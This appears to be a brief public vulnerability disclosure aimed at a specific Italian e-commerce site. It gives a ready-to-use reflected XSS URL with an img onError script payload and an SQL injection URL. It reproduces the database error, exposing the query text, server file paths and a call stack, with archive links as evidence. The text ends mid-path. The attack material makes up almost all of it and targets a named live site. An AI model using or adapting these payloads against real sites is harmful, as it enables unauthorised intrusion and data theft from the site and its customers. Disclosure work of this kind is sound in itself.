XSS https://www.gmashop.it/Ricerca.cfm?testo="><img onError="alert(1)" src="a" /><" archived: http://archive.is/P0OXI SQL Injection sample raising an error https://www.gmashop.it/Inside.cfm?sezione=PRODOTTI&area=PRODOTTI&mod=elenco&apmenu=partner&codpar=2'00 archived: http://archive.is/ufpwM Error Executing Database Query. You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '''00 AND LINGUA = 'IT'' at line 3 The error occurred in /var/www/html/gmashop/Query/Prodotti/SelNomePar.cfm: line 5 Called from /var/www/html/gmashop/Prodotti/Prodotti_elenco.cfm: line 89 Called from /var/www/html/gmashop/Prodotti/Prodotti_elenco.cfm: line 84 Called from /var/www/html/gmashop/Prodotti/Prodotti_elenco.cfm: line 1 Called from /var/www/html/gmashop/Inside.cfm: line 48 Called from /var/www/html/gmashop/Query/Prodotti/SelNo